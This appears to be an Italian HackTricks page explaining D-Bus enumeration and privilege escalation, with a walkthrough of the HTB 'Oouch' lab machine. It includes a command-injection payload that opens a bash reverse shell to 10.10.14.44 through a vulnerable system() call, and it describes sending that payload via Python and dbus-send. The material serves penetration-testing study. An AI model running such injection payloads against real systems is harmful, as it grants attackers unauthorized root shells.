Impara e pratica l'Hacking su AWS:<imgsrc="/.gitbook/assets/arte.png"alt=""data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<imgsrc="/.gitbook/assets/arte.png"alt=""data-size="line">\
Impara e pratica l'Hacking su GCP: <imgsrc="/.gitbook/assets/grte.png"alt=""data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
* Controlla i [**piani di abbonamento**](https://github.com/sponsors/carlospolop)!
* **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Condividi trucchi di hacking inviando PR a** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
D-Bus viene utilizzato come mediatore delle comunicazioni tra processi (IPC) negli ambienti desktop di Ubuntu. Su Ubuntu, si osserva il funzionamento concorrente di diversi bus di messaggi: il bus di sistema, principalmente utilizzato da **servizi privilegiati per esporre servizi rilevanti in tutto il sistema**, e un bus di sessione per ogni utente loggato, che espone servizi rilevanti solo per quel particolare utente. L'attenzione qui è principalmente rivolta al bus di sistema a causa della sua associazione con servizi in esecuzione con privilegi più elevati (ad esempio, root) poiché il nostro obiettivo è elevare i privilegi. Si nota che l'architettura di D-Bus impiega un 'router' per ogni bus di sessione, che è responsabile di reindirizzare i messaggi dei client ai servizi appropriati in base all'indirizzo specificato dai client per il servizio con cui desiderano comunicare.
I servizi su D-Bus sono definiti dagli **oggetti** e **interfacce** che espongono. Gli oggetti possono essere paragonati alle istanze di classe nei linguaggi di programmazione orientati agli oggetti standard, con ciascuna istanza identificata in modo univoco da un **percorso dell'oggetto**. Questo percorso, simile a un percorso del filesystem, identifica in modo univoco ciascun oggetto esposto dal servizio. Un'interfaccia chiave per scopi di ricerca è l'interfaccia **org.freedesktop.DBus.Introspectable**, che presenta un metodo singolo, Introspect. Questo metodo restituisce una rappresentazione XML dei metodi supportati dall'oggetto, dei segnali e delle proprietà, con un focus qui sui metodi tralasciando le proprietà e i segnali.
Per la comunicazione con l'interfaccia D-Bus, sono stati utilizzati due strumenti: uno strumento CLI chiamato **gdbus** per invocare facilmente i metodi esposti da D-Bus negli script, e [**D-Feet**](https://wiki.gnome.org/Apps/DFeet), uno strumento GUI basato su Python progettato per enumerare i servizi disponibili su ciascun bus e visualizzare gli oggetti contenuti in ciascun servizio.
Nella prima immagine vengono mostrati i servizi registrati con il bus di sistema D-Bus, con **org.debin.apt** specificamente evidenziato dopo aver selezionato il pulsante Bus di Sistema. D-Feet interroga questo servizio per gli oggetti, visualizzando interfacce, metodi, proprietà e segnali per gli oggetti scelti, come si vede nella seconda immagine. Viene anche dettagliata la firma di ciascun metodo.
Una caratteristica notevole è la visualizzazione dell'**ID del processo (pid)** e della **riga di comando** del servizio, utili per confermare se il servizio viene eseguito con privilegi elevati, importante per la rilevanza della ricerca.
**D-Feet consente anche l'invocazione di metodi**: gli utenti possono inserire espressioni Python come parametri, che D-Feet converte in tipi D-Bus prima di passarli al servizio.
Tuttavia, si noti che **alcuni metodi richiedono autenticazione** prima di consentirci di invocarli. Ignoreremo questi metodi, poiché il nostro obiettivo è di elevare i nostri privilegi senza credenziali in primo luogo.
Si noti inoltre che alcuni dei servizi interrogano un altro servizio D-Bus chiamato org.freedeskto.PolicyKit1 per verificare se a un utente dovrebbe essere consentito di eseguire determinate azioni o meno.
[Da Wikipedia:](https://en.wikipedia.org/wiki/D-Bus) Quando un processo stabilisce una connessione a un bus, il bus assegna alla connessione un nome speciale chiamato _nome di connessione univoco_. I nomi dei bus di questo tipo sono immutabili: è garantito che non cambieranno finché la connessione esiste e, cosa più importante, non possono essere riutilizzati durante la vita del bus. Ciò significa che nessun'altra connessione a quel bus avrà mai assegnato un nome di connessione univoco simile, anche se lo stesso processo chiude la connessione al bus e ne crea una nuova. I nomi di connessione univoci sono facilmente riconoscibili perché iniziano con il carattere due punti—altrimenti vietato.
Nota il metodo `.Block` dell'interfaccia `htb.oouch.Block` (quella che ci interessa). La "s" delle altre colonne potrebbe significare che si aspetta una stringa.
Per **monitorare** una **comunicazione** dovrai essere **root**. Se riscontri ancora problemi da root, controlla [https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/](https://piware.de/2013/09/how-to-watch-system-d-bus-method-calls/) e [https://wiki.ubuntu.com/DebuggingDBus](https://wiki.ubuntu.com/DebuggingDBus)
Se sai come configurare un file di configurazione D-Bus per **consentire agli utenti non root di intercettare** la comunicazione, per favore **contattami**!
Nell'esempio seguente l'interfaccia `htb.oouch.Block` viene monitorata e **viene inviato il messaggio "**_**lalalalal**_**" attraverso una comunicazione errata**:
Consulta la [documentazione di D-Bus](http://dbus.freedesktop.org/doc/dbus-specification.html) per ulteriori informazioni sulla sintassi delle regole di corrispondenza.
Come utente **qtc all'interno dell'host "oouch" da HTB** puoi trovare un **file di configurazione D-Bus inaspettato** situato in _/etc/dbus-1/system.d/htb.oouch.Block.conf_:
Nota dalla configurazione precedente che **dovrai essere l'utente `root` o `www-data` per inviare e ricevere informazioni** tramite questa comunicazione D-BUS.
Come utente **qtc** all'interno del container docker **aeb4525789d8** puoi trovare del codice correlato a dbus nel file _/code/oouch/routes.py._ Questo è il codice interessante:
Dall'altra parte della connessione D-Bus c'è un binario compilato in C in esecuzione. Questo codice sta **ascoltando** sulla connessione D-Bus **per l'indirizzo IP e sta chiamando iptables tramite la funzione `system`** per bloccare l'indirizzo IP fornito.\
**La chiamata a `system` è vulnerabile appositamente all'injection di comandi**, quindi un payload come il seguente creerà una shell inversa: `;bash -c 'bash -i >& /dev/tcp/10.10.14.44/9191 0>&1' #`
Alla fine di questa pagina puoi trovare il **codice C completo dell'applicazione D-Bus**. All'interno puoi trovare tra le righe 91-97 **come il `percorso dell'oggetto D-Bus`****e il `nome dell'interfaccia`** sono **registrati**. Queste informazioni saranno necessarie per inviare informazioni alla connessione D-Bus:
Inoltre, nella riga 57 puoi trovare che **l'unico metodo registrato** per questa comunicazione D-Bus si chiama `Block` (_**Ecco perché nella sezione seguente i payload verranno inviati all'oggetto di servizio `htb.oouch.Block`, all'interfaccia `/htb/oouch/Block` e al nome del metodo `Block`**_):
Il seguente codice python invierà il payload alla connessione D-Bus al metodo `Block` tramite `block_iface.Block(runme)` (_nota che è stato estratto dal pezzo di codice precedente_):
* Message Bus - Un software utilizzato dai sistemi per facilitare le comunicazioni tra le applicazioni. È correlato alla Message Queue (i messaggi sono ordinati in sequenza), ma nel Message Bus i messaggi vengono inviati in un modello di sottoscrizione ed è anche molto veloce.
* Il tag "-system" viene utilizzato per indicare che si tratta di un messaggio di sistema, non di un messaggio di sessione (per impostazione predefinita).
* Il tag "--print-reply" viene utilizzato per stampare il nostro messaggio in modo appropriato e ricevere eventuali risposte in un formato leggibile dall'utente.
* "--string:" - Tipo di messaggio che desideriamo inviare all'interfaccia. Ci sono diversi formati per l'invio di messaggi come double, bytes, booleans, int, objpath. Tra questi, il "object path" è utile quando vogliamo inviare un percorso di un file all'interfaccia Dbus. Possiamo utilizzare un file speciale (FIFO) in questo caso per passare un comando all'interfaccia con il nome di un file. "string:;" - Questo serve per richiamare nuovamente il percorso dell'oggetto dove posizioniamo il file/comando shell inverso FIFO.
_Nota che in `htb.oouch.Block.Block`, la prima parte (`htb.oouch.Block`) fa riferimento all'oggetto di servizio e l'ultima parte (`.Block`) fa riferimento al nome del metodo._
Impara e pratica l'Hacking su AWS:<imgsrc="/.gitbook/assets/arte.png"alt=""data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<imgsrc="/.gitbook/assets/arte.png"alt=""data-size="line">\
Impara e pratica l'Hacking su GCP: <imgsrc="/.gitbook/assets/grte.png"alt=""data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
* **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
